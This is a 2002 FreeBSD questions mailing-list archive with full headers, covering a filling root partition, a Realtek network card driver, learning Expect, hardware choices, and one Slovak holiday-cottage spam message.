-0700 (PDT) Received: from hewlettsqusv2q (66-81-24-244-modem.o1.com [66.81.24.244]) by host3.visualpresence2000.com (8.10.2/8.10.2) with SMTP id g5OH0Aw18836; Mon, 24 Jun 2002 13:00:14 -0400 Message-ID: <002f01c21ba0$96411480$f4185142@hewlettsqusv2q> From: "Ken" To: "Henning, Brian" , References: Subject: Re: root partition Date: Mon, 24 Jun 2002 09:57:01 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, I am guessing that it is log files that are being kept in /var that may be filling up. Check /var/log ----- Original Message ----- From: "Henning, Brian" To: Sent: Monday, June 24, 2002 9:48 AM Subject: root partition > Hello- > I keep having a problem with filling up my root partition. I combine / and > /var with 150M of space. Is that enough space? I don't copy files to this > partition so I don't really know how it would fill up? Should I just create > a bigger partition or is there something I am missing here? > thanks, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10: 2:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tbaytel.net (tbaytel3.tbaytel.net [206.47.150.179]) by hub.freebsd.org (Postfix) with ESMTP id AC9B637B406 for ; Mon, 24 Jun 2002 10:01:59 -0700 (PDT) Received: from sol (vickesh01-1376.tbaytel.net [204.50.183.176]) by tbaytel.net (8.11.2/) with SMTP id g5OH1s8303128 for ; Mon, 24 Jun 2002 13:01:55 -0400 Message-ID: <011b01c21ba1$1cb2f510$7f0ea8c0@sol> Reply-To: "Justin P. Michel" From: "Justin P. Michel" To: References: <00be01c21b93$d841d250$7f0ea8c0@sol> <011a01c21b98$132dc1e0$1200a8c0@gsicomp.on.ca> <00f701c21b9c$d171f5f0$7f0ea8c0@sol> <013c01c21b9d$cbdc67f0$1200a8c0@gsicomp.on.ca> Subject: Re: Proper Driver for Network Card: Realtek 8019AS Date: Mon, 24 Jun 2002 13:03:44 -0400 Organization: J Continuum MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Matthew, Thanks! It's all working good now! ----- Original Message ----- From: "Matthew Emmerton" To: "Justin P. Michel" ; Sent: Monday, June 24, 2002 12:40 PM Subject: Re: Proper Driver for Network Card: Realtek 8019AS > Yes, I believe that should work. > > Matt > > ----- Original Message ----- > From: "Justin P. Michel" > To: "Matthew Emmerton" ; > Sent: Monday, June 24, 2002 12:33 PM > Subject: Re: Proper Driver for Network Card: Realtek 8019AS > > > > Matthew, > > > > If I leave the card in PNP mode, do I just use the line: > > > > device ed > > > > in my kernel? > > > > > > > > ----- Original Message ----- > > From: "Matthew Emmerton" > > To: "Justin P. Michel" > > Sent: Monday, June 24, 2002 11:59 AM > > Subject: Re: Proper Driver for Network Card: Realtek 8019AS > > > > > > > The ed driver is what you need to use for cards using the RT8019 chip. > > > > > > ----- Original Message ----- > > > From: "Justin P. Michel" > > > To: > > > Sent: Monday, June 24, 2002 11:28 AM > > > Subject: Proper Driver for Network Card: Realtek 8019AS > > > > > > > > > > Greetings, > > > > > > > > I am trying to configure an ISA 16-bit Realtek 8019AS in FreeBSD > V4.5R. > > > > > > > > If someone has already done so, or knows where I can do some Internet > > > > reading, please steer me in the right direction. > > > > > > > > Regards, > > > > > > > > Justin P. Michel > > > > |- J Continuum > > > > |- 21071 - 640 River Street > > > > |- Thunder Bay, Ontario, Canada > > > > |- P7A 8A7 > > > > |- (807) 344-9623 > > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10: 3:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cs.selu.edu (cs.selu.edu [147.174.59.5]) by hub.freebsd.org (Postfix) with ESMTP id 1839A37B430 for ; Mon, 24 Jun 2002 10:02:44 -0700 (PDT) Received: from localhost (jholland@localhost) by cs.selu.edu (8.11.6/8.11.2) with ESMTP id g5OH2fV28929; Mon, 24 Jun 2002 12:02:41 -0500 Date: Mon, 24 Jun 2002 12:02:40 -0500 (CDT) From: Jason P Holland To: "Henning, Brian" Cc: questions@FreeBSD.ORG Subject: Re: root partition In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hmm, that is a bit low. you could investigate what is filling up? try a cd / du -sh * periodically, that should help you narrow down what is filling up. it might be the logs in /var though jason > Hello- > I keep having a problem with filling up my root partition. I combine / and > /var with 150M of space. Is that enough space? I don't copy files to this > partition so I don't really know how it would fill up? Should I just create > a bigger partition or is there something I am missing here? > thanks, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10: 7:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-send.myrealbox.com (smtp-send.myrealbox.com [192.108.102.143]) by hub.freebsd.org (Postfix) with ESMTP id 13D7637B400 for ; Mon, 24 Jun 2002 10:07:07 -0700 (PDT) Received: from jogega jogegabsd@smtp-send.myrealbox.com [216.230.149.233] by smtp-send.myrealbox.com with NetMail SMTP Agent $Revision: 3.9 $ on Novell NetWare; Mon, 24 Jun 2002 11:07:06 -0600 From: "jogegabsd" To: Subject: Learning Expect Date: Mon, 24 Jun 2002 11:07:12 -0600 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello all. I'm trying to learn expect right now, and I was wondering if any of you know or have a nice tutorial or link that I can use to learn expect. I already check out the "Exploring Expect" book, but I'm kind of worry the book is to old(besides I have no money :D ) thanks in advance Gerardo Amaya To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:12:18 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp1.nx.nextra.sk (smtp1.nx.nextra.sk [195.168.1.108]) by hub.freebsd.org (Postfix) with SMTP id C689D37B406 for ; Mon, 24 Jun 2002 10:11:42 -0700 (PDT) Received: (qmail 5623 invoked from network); 24 Jun 2002 17:11:03 -0000 Received: from unknown (HELO p4) (195.168.79.72) by 0 with SMTP; 24 Jun 2002 17:11:03 -0000 Message-ID: <001f01c21ba2$45a21fe0$484fa8c3@p4> From: =?iso-8859-2?Q?August=EDn_Kacl?= To: Subject: x4 R e l a x Date: Mon, 24 Jun 2002 17:43:13 +0200 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0012_01C21BA6.9D68B000" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0012_01C21BA6.9D68B000 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable Nevyhovuje V=E1m dovolenka pri mori ? Str=E1vte ju v hor=E1ch v = zdravom prostredi. Aj na Slovensku sa d=E1 prezit kr=E1sna a pohodov=E1 = dovolenka. Rekreacne pobyty pre rodiny s de=BBmi (10 osob+2 pristelky), = ako aj pre zamestnancov roznych firiem a organiz=E1cii, pon=FAkame v = nadstandardnej v=FDbave a kvalite, kde uspokoj=EDme aj t=FDch = n=E1rocnejs=EDch. Rekreacn=FD dom ALEXANDRA v lokalite M A R T I N S K = =C9 H O L E - Str=E1ne, v peknom horskom prostred=ED, d=E1vaj=FA = predpoklad k maxim=E1lnej spokojnosti a opatovn=FDch n=E1vratov k n=E1m. Ak V=E1s t=E1to inform=E1cia zaujala, doporucujeme navst=EDvit web = str=E1nku: www.chataalexandra.host.sk , kde sa dozviete vsetky = potrebn=E9 inform=E1cie o objekte a okol=ED, ako aj kontaktn=E9 = telef=F3ny a adresu. Pre organiz=E1cie, ktor=E9 dok=E1zu vytazit tento = objekt poskytneme v=FDrazn=FA zlavu az do v=FDsky 30 % z uv=E1dzan=FDch = cien. Objekt je vhodn=FD aj pre mensie skolenia a kurzy, rodinn=E9 = oslavy, ako aj na rekreacn=E9 pobyty pre zamestnancov firiem a = organiz=E1cii z prostriedkov tvoren=FDch v soci=E1lnom fonde v zmysle = z=E1k. 152/94 Zz. Z=E1roven sa ospravedlnujeme za to, ze sme si = dovolili poslat k Vasej pozornosti tento e-mail. Pokial by V=E1s to = obta=BEovalo a prek=E1zalo V=E1m to, tak n=E1m to l=E1skavo dajte na = vedomie, aby sme V=E1s z adres=E1ra vymazali.=20 =20 Za pochopenie dakujeme a tes=EDme sa na stretnutie ! =20 August=EDn Kacl --- Odch=E1dzaj=FAca spr=E1va neobsahuje v=EDrusy. Skontrolovan=E9 antiv=EDrusov=FDm syst=E9mom AVG = (http://www.grisoft.cz). Verzia: 6.0.370 / V=EDrusov=E1 datab=E1za: 205 - d=E1tum vydania: = 5.6.2002 ------=_NextPart_000_0012_01C21BA6.9D68B000 Content-Type: text/html; charset="iso-8859-2" Content-Transfer-Encoding: quoted-printable
    Nevyhovuje = V=E1m dovolenka=20 pri mori ? Str=E1vte ju v hor=E1ch v zdravom prostredi. Aj na = Slovensku sa d=E1 prezit=20 kr=E1sna a pohodov=E1 dovolenka. Rekreacne pobyty pre rodiny s de=BBmi = (10 osob+2=20 pristelky), ako aj pre zamestnancov roznych firiem a organiz=E1cii, = pon=FAkame v=20 nadstandardnej v=FDbave a kvalite, kde uspokoj=EDme aj t=FDch = n=E1rocnejs=EDch. =20 Rekreacn=FD dom ALEXANDRA v=20 lokalite M A R T I N S K =C9  H O L E - Str=E1ne, v = peknom=20 horskom prostred=ED, d=E1vaj=FA predpoklad k maxim=E1lnej spokojnosti a = opatovn=FDch=20 n=E1vratov k n=E1m.

    Ak V=E1s t=E1to = inform=E1cia zaujala,=20 doporucujeme navst=EDvit web str=E1nku: www.chataalexandra.host.sk= , kde sa=20 dozviete vsetky potrebn=E9 inform=E1cie o objekte a okol=ED, ako aj = kontaktn=E9 telef=F3ny=20 a adresu. Pre organiz=E1cie, ktor=E9 dok=E1zu vytazit tento objekt = poskytneme=20 v=FDrazn=FA zlavu az do v=FDsky 30 % z uv=E1dzan=FDch cien. Objekt=20 je
vhodn=FD aj pre mensie = skolenia a kurzy,=20 rodinn=E9 oslavy, ako aj na rekreacn=E9 pobyty=20 pre zamestnancov firiem a organiz=E1cii z prostriedkov tvoren=FDch v=20 soci=E1lnom fonde v zmysle = z=E1k. 152/94=20 Zz.  Z=E1roven sa ospravedlnujeme za to, ze sme si dovolili poslat k Vasej = pozornosti=20 tento e-mail. Pokial by V=E1s to obta=BEovalo a prek=E1zalo V=E1m to, = tak n=E1m to l=E1skavo=20 dajte na vedomie, aby sme V=E1s z adres=E1ra vymazali.=20
   =20
    Za = pochopenie dakujeme a=20 tes=EDme sa na stretnutie=20 !
   =20
    August=EDn=20 Kacl
 

---
Odch=E1dzaj=FAca = spr=E1va neobsahuje=20 v=EDrusy.
Skontrolovan=E9 antiv=EDrusov=FDm syst=E9mom AVG (http://www.grisoft.cz).
Verzia: = 6.0.370 /=20 V=EDrusov=E1 datab=E1za: 205 - d=E1tum vydania:=20 5.6.2002
------=_NextPart_000_0012_01C21BA6.9D68B000-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:12:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from main.g-networks.net (main.g-networks.net [66.33.109.28]) by hub.freebsd.org (Postfix) with ESMTP id AACB037B407 for ; Mon, 24 Jun 2002 10:11:58 -0700 (PDT) Received: from localhost (localhost.localdomain [127.0.0.1]) by main.g-networks.net (Postfix) with ESMTP id 3C7CA7F41F; Mon, 24 Jun 2002 12:10:10 -0400 (EDT) Received: by main.g-networks.net (Postfix, from userid 1277) id DE7A07F41D; Mon, 24 Jun 2002 12:10:07 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by main.g-networks.net (Postfix) with ESMTP id D71EA7F41C; Mon, 24 Jun 2002 12:10:07 -0400 (EDT) Date: Mon, 24 Jun 2002 12:10:07 -0400 (EDT) From: Rodolfo Gonzalez X-X-Sender: rodolfo@main.g-networks.net To: Matt Snow Cc: Steve Warwick , Subject: Re: [OFF] Pentium vs Athlon which is better In-Reply-To: <20020623234217.N24434-100000@seven.slakin.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by Global Networks Technologies Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, 23 Jun 2002, Matt Snow wrote: > > As an addendum, any opinion on components? [motherboard, ram, HD, NIC etc] There's a small problem with AMD's, you need a very good fan or cooling system. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:13:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hotmail.com (f89.law10.hotmail.com [64.4.15.89]) by hub.freebsd.org (Postfix) with ESMTP id 4C02137B407 for ; Mon, 24 Jun 2002 10:12:47 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 24 Jun 2002 10:12:47 -0700 Received: from 68.35.141.197 by lw10fd.law10.hotmail.msn.com with HTTP; Mon, 24 Jun 2002 17:12:46 GMT X-Originating-IP: [68.35.141.197] From: "Nicholas Koluncich" To: freebsd-questions@FreeBSD.ORG Subject: Fwd: Delivery Status Notification (Failure) Date: Mon, 24 Jun 2002 10:12:46 -0700 Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_3d7f_741a_1ac2" Message-ID: X-OriginalArrivalTime: 24 Jun 2002 17:12:47.0149 (UTC) FILETIME=[5C918DD0:01C21BA2] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_3d7f_741a_1ac2 Content-Type: text/html






Nicholas Koluncich III
>From: postmaster@mail.hotmail.com
>To: nkoluncich@hotmail.com
>Subject: Delivery Status Notification (Failure)
>Date: Mon, 24 Jun 2002 10:03:26 -0700
>
>This is an automatically generated Delivery Status Notification.
>
>Delivery to the following recipients failed.
>
> mailto:freebsd-questions@FreeBSD.ORG
>
>
>


Send and receive Hotmail on your mobile device: Click Here
------=_NextPart_000_3d7f_741a_1ac2 Content-Type: message/delivery-status Reporting-MTA: dns;hotmail.com Received-From-MTA: dns;mail.hotmail.com Arrival-Date: Mon, 24 Jun 2002 10:03:26 -0700 Final-Recipient: rfc822;mailto:freebsd-questions@FreeBSD.ORG Action: failed Status: 5.1.3 ------=_NextPart_000_3d7f_741a_1ac2 Content-Type: message/rfc822 Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 24 Jun 2002 10:03:26 -0700 Received: from 68.35.141.197 by lw10fd.law10.hotmail.msn.com with HTTP; Mon, 24 Jun 2002 17:03:26 GMT X-Originating-IP: [68.35.141.197] From: "Nicholas Koluncich" To: mailto:freebsd-questions@FreeBSD.ORG Cc: nkoluncich@hotmail.com Bcc: Subject: Simple Question. Date: Mon, 24 Jun 2002 10:03:26 -0700 Mime-Version: 1.0 Content-Type: text/html Message-ID: X-OriginalArrivalTime: 24 Jun 2002 17:03:26.0671 (UTC) FILETIME=[0E7F65F0:01C21BA1]


Dear Person,

I have crash problems using Windows 98 on my little HP Pavillion 8750C machine, especially when the internet is running through my comcast cable modum.  Do you think that FreeBSD would help on that?  Thank You.

Nicholas Koluncich III


MSN Photos is the easiest way to share and print your photos: Click Here
------=_NextPart_000_3d7f_741a_1ac2-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:15:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from rambo.simx.org (rambo.simx.org [80.65.205.166]) by hub.freebsd.org (Postfix) with ESMTP id BF54737B403 for ; Mon, 24 Jun 2002 10:15:47 -0700 (PDT) Received: from rambo.simx.org (rocky [192.168.0.2]) by rambo.simx.org (8.12.3/8.12.3) with ESMTP id g5OHFViH096947; Mon, 24 Jun 2002 19:15:34 +0200 (CEST) (envelope-from listsub@rambo.simx.org) Message-ID: <3D175456.7040709@rambo.simx.org> Date: Mon, 24 Jun 2002 19:18:14 +0200 From: "Roger 'Rocky' Vetterberg" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.0rc2) Gecko/20020512 Netscape/7.0b1 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Changpeng Zhao Cc: freebsd-questions@FreeBSD.ORG Subject: Re: user forum References: Content-Type: text/plain; charset=ISO-2022-JP Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Changpeng Zhao wrote: > Why don't you set up an online user-forum? > > Forums are far better than mailings list and newsgroups for user > (peer-to-peer) support. There are free forum packages out there and the > installation is very easy. > > Just a though. > > Changpeng Zhao There are plenty of forums available. www.bsdvault.net, www.freebsddiary.org, and of course www.freebsdforums.com just to mention a few. -- R To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:24:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.navitaire.com (mail.navitaire.com [205.182.62.81]) by hub.freebsd.org (Postfix) with ESMTP id 37A4937B439 for ; Mon, 24 Jun 2002 10:23:33 -0700 (PDT) Received: from exchange.Navitaire.com (exch.navitaire.com [149.122.4.14]) by mail.navitaire.com (Switch-2.1.4/Switch-2.1.0) with ESMTP id g5OHNPr26699; Mon, 24 Jun 2002 12:23:25 -0500 (CDT) Received: by exchange.Navitaire.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 12:21:27 -0500 Message-ID: From: "Henning, Brian" To: "'Jason P Holland'" Cc: questions@FreeBSD.ORG Subject: RE: root partition Date: Mon, 24 Jun 2002 12:21:22 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG here is the result of my du -sh * 6.0K COPYRIGHT 3.9M bin 390K boot 2.0K cdrom 0B compat 70K dev 2.0K dist 998K etc 636M home 4.0M kernel 3.5M kernel.GENERIC 2.0K mnt 5.1M modules 2.0K mycd 17K proc 99M root 11M sbin 2.1M stand 0B sys 8.0K tmp 1.8G usr 11M var -----Original Message----- From: Jason P Holland [mailto:jholland@cs.selu.edu] Sent: Monday, June 24, 2002 12:03 PM To: Henning, Brian Cc: questions@FreeBSD.ORG Subject: Re: root partition hmm, that is a bit low. you could investigate what is filling up? try a cd / du -sh * periodically, that should help you narrow down what is filling up. it might be the logs in /var though jason > Hello- > I keep having a problem with filling up my root partition. I combine / and > /var with 150M of space. Is that enough space? I don't copy files to this > partition so I don't really know how it would fill up? Should I just create > a bigger partition or is there something I am missing here? > thanks, > brian > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:28:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cs.selu.edu (cs.selu.edu [147.174.59.5]) by hub.freebsd.org (Postfix) with ESMTP id F27E937B401 for ; Mon, 24 Jun 2002 10:28:04 -0700 (PDT) Received: from localhost (jholland@localhost) by cs.selu.edu (8.11.6/8.11.2) with ESMTP id g5OHS2L29561; Mon, 24 Jun 2002 12:28:02 -0500 Date: Mon, 24 Jun 2002 12:28:02 -0500 (CDT) From: Jason P Holland To: "Henning, Brian" Cc: questions@FreeBSD.ORG Subject: RE: root partition In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG what partitions do you have seperate from /? /usr and /home? most likely /var and /root are going to be growing if that is the case, and /root is only going to grow if you add files yourself, /var will grow as the logs grow. keep an eye on /var jason > here is the result of my > du -sh * > 6.0K COPYRIGHT > 3.9M bin > 390K boot > 2.0K cdrom > 0B compat > 70K dev > 2.0K dist > 998K etc > 636M home > 4.0M kernel > 3.5M kernel.GENERIC > 2.0K mnt > 5.1M modules > 2.0K mycd > 17K proc > 99M root > 11M sbin > 2.1M stand > 0B sys > 8.0K tmp > > 1.8G usr > 11M var > > > -----Original Message----- > From: Jason P Holland [mailto:jholland@cs.selu.edu] > Sent: Monday, June 24, 2002 12:03 PM > To: Henning, Brian > Cc: questions@FreeBSD.ORG > Subject: Re: root partition > > > > hmm, that is a bit low. you could investigate what is filling up? try a > > cd / > du -sh * > > periodically, that should help you narrow down what is filling up. it > might be the logs in /var though > > jason > > > Hello- > > I keep having a problem with filling up my root partition. I combine / and > > /var with 150M of space. Is that enough space? I don't copy files to this > > partition so I don't really know how it would fill up? Should I just > create > > a bigger partition or is there something I am missing here? > > thanks, > > brian > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:33: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tomts24-srv.bellnexxia.net (tomts24.bellnexxia.net [209.226.175.187]) by hub.freebsd.org (Postfix) with ESMTP id 3B07B37B428 for ; Mon, 24 Jun 2002 10:32:47 -0700 (PDT) Received: from xena.gsicomp.on.ca ([65.95.179.11]) by tomts24-srv.bellnexxia.net (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP id <20020624173248.FIYP17239.tomts24-srv.bellnexxia.net@xena.gsicomp.on.ca>; Mon, 24 Jun 2002 13:32:48 -0400 Received: from hermes (hermes.gsicomp.on.ca [192.168.0.18]) by xena.gsicomp.on.ca (8.11.3/8.11.3) with SMTP id g5OGItE29346; Mon, 24 Jun 2002 12:18:55 -0400 (EDT) (envelope-from matt@gsicomp.on.ca) Message-ID: <018801c21ba5$26ca4860$1200a8c0@gsicomp.on.ca> From: "Matthew Emmerton" To: "Henning, Brian" , "'Jason P Holland'" Cc: References: Subject: Re: root partition Date: Mon, 24 Jun 2002 13:32:44 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG See the "99M root" entry? Close to 2/3 of your disk usage is in root's home directory. My first reaction is "oh, you must be using root as your normal login, and root's homedir is filled with all sorts of user information, like KDE configuration, bookmarks, netscape cache, etc." If this is true, please create a normal user account and use it for your day-to-day stuff, and save root for system administration (adding packages, adjusting configurations, etc.) That may not be the case entirely. Other culprits include CPAN, which can easily add a few hundred MB to root's homedir. Run the same comment from root's home directory (/root) and see what is using up space. -- Matt Emmerton ----- Original Message ----- From: "Henning, Brian" To: "'Jason P Holland'" Cc: Sent: Monday, June 24, 2002 1:21 PM Subject: RE: root partition > here is the result of my > du -sh * > 6.0K COPYRIGHT > 3.9M bin > 390K boot > 2.0K cdrom > 0B compat > 70K dev > 2.0K dist > 998K etc > 636M home > 4.0M kernel > 3.5M kernel.GENERIC > 2.0K mnt > 5.1M modules > 2.0K mycd > 17K proc > 99M root > 11M sbin > 2.1M stand > 0B sys > 8.0K tmp > > 1.8G usr > 11M var > > > -----Original Message----- > From: Jason P Holland [mailto:jholland@cs.selu.edu] > Sent: Monday, June 24, 2002 12:03 PM > To: Henning, Brian > Cc: questions@FreeBSD.ORG > Subject: Re: root partition > > > > hmm, that is a bit low. you could investigate what is filling up? try a > > cd / > du -sh * > > periodically, that should help you narrow down what is filling up. it > might be the logs in /var though > > jason > > > Hello- > > I keep having a problem with filling up my root partition. I combine / and > > /var with 150M of space. Is that enough space? I don't copy files to this > > partition so I don't really know how it would fill up? Should I just > create > > a bigger partition or is there something I am missing here? > > thanks, > > brian > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 10:36:23 2002 Delivered-To: freebsd-questions@freebsd.org Received: from fep06-app.kolumbus.fi (fep06-0.kolumbus.fi [193.229.0.57]) by hub.freebsd.org (Postfix) with ESMTP id 079F137B401 for ; Mon, 24 Jun 2002 10:36:14 -0700 (PDT) Received: from coat.st-paul ([212.54.20.95]) by fep06-app.kolumbus.fi with ESMTP id <20020624173607.JAXI20539.fep06-app.kolumbus.fi@coat.st-paul>; Mon, 24 Jun 2002 20:36:07 +0300 Received: from shoes.st-paul (shoes.st-paul [10.10.10.10]) by coat.st-paul (8.12.3/8.11.6) with ESMTP id g5OHZvZQ095940; Mon, 24 Jun 2002 20:35:57 +0300 (EEST) (envelope-from juha.ylitalo@iki.fi) Received: from shoes.st-paul (localhost [127.0.0.1]) by shoes.st-paul (8.12.3/8.11.6) with ESMTP id g5OHZuT8000858; Mon, 24 Jun 2002 20:35:56 +0300 (EEST) (envelope-from juha.ylitalo@iki.fi) Received: (from jylitalo@localhost) by shoes.st-paul (8.12.3/8.12.3/Submit) id g5OHZs5T000857; Mon, 24 Jun 2002 20:35:54 +0300 (EEST) X-Authentication-Warning: shoes.st-paul: jylitalo set sender to juha.ylitalo@iki.fi using -f Subject: Re: Learning Expect From: Juha Ylitalo To: jogegabsd Cc: freebsd-questions@FreeBSD.ORG In-Reply-To: References: Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.5 Date: 24 Jun 2002 20:35:54 +0300 Message-Id: <1024940154.241.147.camel@shoes.st-paul> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon, 2002-06-24 at 20:07, jogegabsd wrote: > Hello all. I'm trying to learn expect right now, and I > was wondering if any of you know or have a nice tutorial > or link that I can use to learn expect. > I already check out the "Exploring Expect" book, > but I'm kind of worry the book is to old(besides I have no money :D ) Even though the book was written '94, all that it says about tcl and expect remains to be true and it was quite helpful, when I had to learn expect on my own. I guess biggest weakness in the book is that it doesn't have anything about tcl's built-in packages (except for Tk, that I don't need :-/). For example Tcl's http package is quite convenient if you have to combine command line testing with web related checks and you don't want to code all http handling by yourself. Then again that kind of stuff should probably belong to book that is strictly about Tcl (and I haven't yet found that would give that information to me). If you feel that Exploring Expect is really something that you can't afford, http://expect.nist.gov/ has section for "Articles, Papers and Chapters of Expect". Newest additions on that list are from '99. In other sections, they have links to FAQs, tutorials, etc. www.usenix.org also has some conference papers, which cover expect. -- Juha Ylitalo juha.ylitalo@iki.fi +358 40 562 6152 